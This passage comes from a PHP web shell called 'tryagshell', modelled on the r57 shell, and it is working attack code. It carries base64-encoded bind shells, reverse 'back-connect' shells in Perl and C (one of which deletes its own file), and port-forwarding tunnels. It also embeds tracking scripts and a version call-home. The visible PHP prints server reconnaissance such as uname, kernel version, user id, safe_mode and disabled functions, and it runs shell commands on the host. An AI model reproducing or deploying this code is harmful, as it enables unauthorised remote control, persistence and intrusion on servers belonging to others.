1574 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1575 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1576 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1577 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1578 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1579 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1580 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1581 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1582 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1583 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1584 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1585 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1586 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1587 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1588 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1589 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1590 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1591 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1592 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1593 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1594 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1595 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1596 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1597 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1598 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1599 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1600 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1601 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1602 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1603 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1604 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1605 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1606 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1607 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1608 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1609 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1610 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1611 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1612 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1613 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1614 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1615 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1616 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1617 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1618 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1619 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1620 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1621 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1622 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1623 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1624 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1625 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1626 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1627 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1628 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1629 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1630 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1631 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1632 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1633 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1634 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1635 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1636 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1637 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1638 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1639 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1640 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1641 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1642 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1643 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1644 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1645 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1646 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1647 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1648 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1649 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1650 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1651 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1652 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1653 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1654 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1655 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1656 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1657 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1658 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1659 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1660 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1661 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1662 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1663 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1664 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1665 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1666 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1667 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1668 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1669 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1670 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1671 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1672 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1673 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1674 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1675 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1676 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1677 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1678 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1679 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1680 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1681 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1682 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1683 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1684 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1685 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1686 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1687 ybmV0LS0+";
1688 echo $head;
1689 echo '</head>';
1690 if(empty($_POST['cmd'])) {
1691 $serv = array(127,192,172,10);
1692 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
1693 $current_version = str_replace('.','',$version);
1694 if (!in_array($addr[0], $serv)) {
1695 @print "<img src=\"http://127.0.0.1/tryagshell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1696 @readfile ("http://127.0.0.1/tryagshell/version.php?version=".$current_version."");}}
1697 echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1698 <tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
1699 <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'tryagshell '.$version.'</b>
1700 </font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1701 echo ws(2);
1702 echo "<b>".date ("d-m-Y H:i:s")."</b>";
1703 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1704 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1705 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1706 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1707 if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
1708 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1709 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1710 echo ws(2);
1711 echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
1712 echo ws(2);
1713 echo "PHP version: <b>".@phpversion()."</b>";
1714 $curl_on = @function_exists('curl_version');
1715 echo ws(2);
1716 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
1717 echo ws(2);
1718 echo "MySQL: <b>";
1719 $mysql_on = @function_exists('mysql_connect');
1720 if($mysql_on){
1721 echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
1722 echo ws(2);
1723 echo "MSSQL: <b>";
1724 $mssql_on = @function_exists('mssql_connect');
1725 if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1726 echo ws(2);
1727 echo "PostgreSQL: <b>";
1728 $pg_on = @function_exists('pg_connect');
1729 if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1730 echo ws(2);
1731 echo "Oracle: <b>";
1732 $ora_on = @function_exists('ocilogon');
1733 if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1734 echo "<br>".ws(2);
1735 echo "Disable functions : <b>";
1736 if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1737 $free = @diskfreespace($dir);
1738 if (!$free) {$free = 0;}
1739 $all = @disk_total_space($dir);
1740 if (!$all) {$all = 0;}
1741 $used = $all-$free;
1742 $used_percent = @round(100/($all/$free),2);
1743 echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
1744 echo '</font></td></tr><table>
1745 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1746 <tr><td align=right width=100>';
1747 echo $font;
1748 if(!$windows){
1749 echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1750 echo "</td><td>";
1751 echo "<font face=Verdana size=-2 color=red><b>";
1752 $uname = ex('uname -a');
1753 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1754 if(!$safe_mode){
1755 $bsd1 = ex('sysctl -n kern.ostype');
1756 $bsd2 = ex('sysctl -n kern.osrelease');
1757 $lin1 = ex('sysctl -n kernel.ostype');
1758 $lin2 = ex('sysctl -n kernel.osrelease');
1759 }
1760 if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1761 else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1762 else { $sysctl = "-"; }
1763 echo ws(3).$sysctl."<br>";
1764 echo ws(3).ex('echo $OSTYPE')."<br>";
